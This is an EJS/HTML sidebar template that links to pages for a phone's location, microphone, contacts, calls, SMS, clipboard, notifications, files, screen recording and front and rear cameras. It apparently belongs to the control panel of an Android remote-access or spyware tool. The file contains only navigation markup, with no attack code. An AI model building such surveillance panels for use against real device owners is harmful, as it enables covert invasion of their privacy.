<div class="four wide column">
    <div class="ui black vertical pointing inverted secondary fluid menu hoverEdit">
        <a href="<%= baseURL %>/info" class="item <% if (page==='info') { %> active <% } %>">
            <i class="icon info green"></i><img src="/info.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/gps" class="item <% if (page==='gps') { %> active <% } %>">
            <i class="icon map marker alternate green"></i><img src="/location.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/microphone" class="item <% if (page==='microphone') { %> active <% } %>">
            <i class="icon microphone green"></i><img src="/mic.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/contacts" class="item <% if (page==='contacts') { %> active <% } %>">
            <i class="icon address book green"></i><img src="/contact.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/calls" class="item <% if (page==='calls') { %> active <% } %>">
            <i class="icon phone green"></i><img src="/calllog.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/clipboard" class="item <% if (page==='clipboard') { %> active <% } %>">
            <i class="icon clipboard green"></i><img src="/clipboard.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/notifications" class="item <% if (page==='notifications') { %> active <% } %>">
            <i class="icon exclamation green"></i><img src="/notification.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/sms" class="item <% if (page==='sms') { %> active <% } %>">
            <i class="icon comments green"></i><img src="/sms.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/wifi" class="item <% if (page==='wifi') { %> active <% } %>">
            <i class="icon wifi green"></i><img src="/wifi.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/apps" class="item <% if (page==='apps') { %> active <% } %>">
            <i class="icon google play green"></i><img src="/installedapp.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/permissions" class="item <% if (page==='permissions') { %> active <% } %>">
            <i class="icon tasks green"></i><img src="/permission.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/files" class="item <% if (page==='files') { %> active <% } %>">
            <i class="icon folder open green"></i><img src="/file.png" style="width: 100px">
        </a>
        <a href="<%= baseURL %>/downloads" class="item <% if (page==='downloads') { %> active <% } %>">
            <i class="icon download green"></i><img src="/download.png" style="width: 100px">
        </a>

        <a href="<%= baseURL %>/screenshot" class="item <% if (page==='screenshot') { %> active <% } %>">
            <i class="icon image outline green"></i><img src="/screenshot.png" style="width: 100px">
        </a>

        <a href="<%= baseURL %>/screenrecord" class="item <% if (page==='screenrecord') { %> active <% } %>">
            <i class="icon mobile alternate green"></i><img src="/screenrecord.png" style="width: 100px">
        </a>

        <a href="<%= baseURL %>/rearcam" class="item <% if (page==='rearcam') { %> active <% } %>">
            <i class="icon camera green"></i><img src="/rear.png" style="width: 100px">
        </a>

        <a href="<%= baseURL %>/frontcam" class="item <% if (page==='frontcam') { %> active <% } %>">
            <i class="icon camera retro green"></i><img src="/front.png" style="width: 100px">
        </a>

    </div>

</div>
